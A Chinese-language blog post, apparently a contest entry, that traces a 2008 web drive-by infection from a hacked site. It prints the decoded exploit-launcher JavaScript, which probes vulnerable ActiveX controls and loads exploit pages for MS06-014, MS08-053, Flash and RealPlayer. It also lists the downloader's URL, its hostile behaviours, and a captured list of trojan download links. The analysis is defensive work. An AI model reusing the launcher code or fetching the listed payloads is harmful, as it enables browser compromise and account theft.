杀毒大赛:网页挂马详细分析 http://docs.google.com/Doc?id=ddgxtn83_36ghzrpjgh
今天访问amxku大牛博客的时候看到了<<ali也挂了,唉>>的这篇文章,跟踪了一下这个网页木马,把我跟踪分析的过程和大家分享一下 http://www.amxku.net/aliued-cn-hacked/
amxku抓了个图
图中鼠标选定的蓝色代码就是挂马的代码,一时很好奇,跟踪了一下这个网页木马
在firefox里面输入这个网马的地址http://www.dns1999.cn/d3/zz3.htm?x-01,回车
右键,查看这个页面的源代码
代码很简单,只有两行
第一行是真正网马的地址,第二行是一个51la的统计代码,看来挂马的家伙还是很关注统计数据的
继续跟踪http://www.dns1999.cn/d3/123.htm
查看源码,是加密后的网页木马
加密的代码看着都头疼,不过不要紧,有强大的工具,我们有Firefox的firebug插件可以很轻松的就看到了网页木马的源代码
呵呵,又是混合类型的网马,利用了多种漏洞来攻击
document.write("<iframewidth=20 height=0 src=flash.htm></iframe>");
这个是flash文件溢出漏洞,继续跟下去
设置了cookie,判断浏览器的版本,如果是IE浏览器的话定向到ie的溢出链接ifl.html,不是IE的话定向到ffl.html,继续跟踪一下ifl.html吧
这个溢出判断了flash的版本,一个比较老的漏洞了,网上分析的也都比较透彻,也就不多说了.
我们来看一下下载者的地址是多少,分析swf文件是很累人而且不讨好的事情,我们用比较简单的方法来获取下载者的地址,就是在虚拟机里面布置一个有漏洞的环境然后抓包得到下载者的地址,我的虚拟机的flash插件版本是115版的,正好是有漏洞的版本.
这样就抓到了挂马的下载者的地址
http://yang3535234.3322.org/ok.exe
先不急着分析下载者,我们回头看一下其它的网马
document.write("<iframe width=20 height=0src=14.htm></iframe>"); //MS06014漏洞
document.write("<iframewidth=100 height=0 src=as.htm></iframe>"); //这个不熟悉,百度了一下是9月10日milw0rm.com公布的MS08-053Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow
(http://milw0rm.com/exploits/6454)
try{var f;
9var gg=newActiveXObject("GLIEDown.IEDown.1");}
10catch(f){};
11finally{if(f!="[objectError]"){document.write("<iframe width=100 height=0src=lz.htm></iframe>");}} //联众
try{var m;
13var hh=newActiveXObject("Downloader.DLoader.1");}
14catch(m){};
15finally{if(m!="[objectError]"){document.write("<iframewidth=100 height=0src=sina.htm></iframe>");}} //新浪视频
try{var n;
17var ll=newActiveXObject("xxxxxxx");}
18catch(n){};
19finally{if(n!="[objectError]"){document.write("<iframewidth=100 height=0src=office.htm></iframe>");}} //office
try{var b;
21var mm=newActiveXObject("NCTAudioFile2.AudioFile2.2");}
22catch(b){};
23finally{if(b!="[objectError]"){document.write("<iframe width=100 height=0src=NCTAudioFile.htm></iframe>");}}
//NCTAudioFile,这个漏洞的网马不是很熟悉
function test()
25{
26rrooxx = "IER"+ "PCtl.I" + "ERP" + "Ctl.1";
27try
28{
29Like = newActiveXObject(rrooxx);
30}catch(error){return;}
31vvvvv =Like.PlayerProperty("PRODUCTVERSION");
32if(vvvvv<="6.0.14.552")
33document.write("<iframewidth=100 height=0 src=re10.htm></iframe>");
34else
35document.write("<iframewidth=100 height=0 src=re11.htm></iframe>");
36}
//这个则是RealPlayer的ax漏洞挂马利用
跟踪一下http://www.dns1999.cn/d3/as.htm 也就是利用了MS08-053挂马的页面
Shellcode 我用coderui大侠的小工具转换成十六进制码
然后就可以复制到OD里面进行调试这段shellcode,这个就不写了
现在来分析刚才抓到的downloaderhttp://yang3535234.3322.org/ok.exe
用FSGv2.0 -> bart/xt 加壳的,直接FFI脱壳,然后ollydbg载入看字符串,
Delphi写的下载者
呵呵,很有可能是可以通过局域网IPC弱口令传播
要对安全软件干坏事了
写批处理自删除的代码
系统版本的判断和U盘传播的代码
禁用了任务管理器,对安全软件进行映像劫持
修改首页,破坏安全模式
下面的应该是加密的配置的部分,牛X牛X下载者
映像劫持,修改首页,回传统计数据
这个下载者很好笑,把需要映像劫持的安全软件的进程名称都反着写
在虚拟机里面继续用sniffer抓包
发现下载大量的盗号木马,下载者连接www.windows1995.cn/1995.txt,读取内容下载木马
GET /1995.txt HTTP/1.1
User-Agent: InetURL:/1.0
Host: www.windows1995.cn
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 1124
Content-Type: text/plain
Last-Modified: Sat, 20 Sep 2008 17:17:37 GMT
Accept-Ranges: bytes
ETag: W/"4e2e8cc7441bc91:4d2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 20 Sep 2008 17:49:05 GMT
http://www.windows1995.cn/game/meng.exe
http://www.76vp.cn/jj2.exe
http://www.windows1995.cn/game/loutl.exe
http://www.windows1995.cn/game/wow1.exe
http://www.windows1995.cn/game/my.exe
http://www.windows1995.cn/game/zx.exe
http://www.windows1995.cn/game/wl.exe
http://www.windows1995.cn/game/kd.exe
http://www.windows1995.cn/game/fy.exe
http://www.windows1995.cn/game/ct.exe
http://www.windows1995.cn/game/fs.exe
http://www.windows1995.cn/game/zf.exe
http://www.windows1995.cn/game/wen.exe
http://www.windows1995.cn/game/dj.exe
http://www.windows1995.cn/game/cs.exe
http://www.windows1995.cn/game/cq6.exe
http://www.592games.cn/123/1076.exe
http://www.592games.cn/123/game/zt.exe
http://www.592games.cn/123/game/wen2.exe
http://www.592games.cn/123/gam
剩下的就不分析了,睡觉去,这个就是最近相当流行的修改首页为3929.cn的木马~
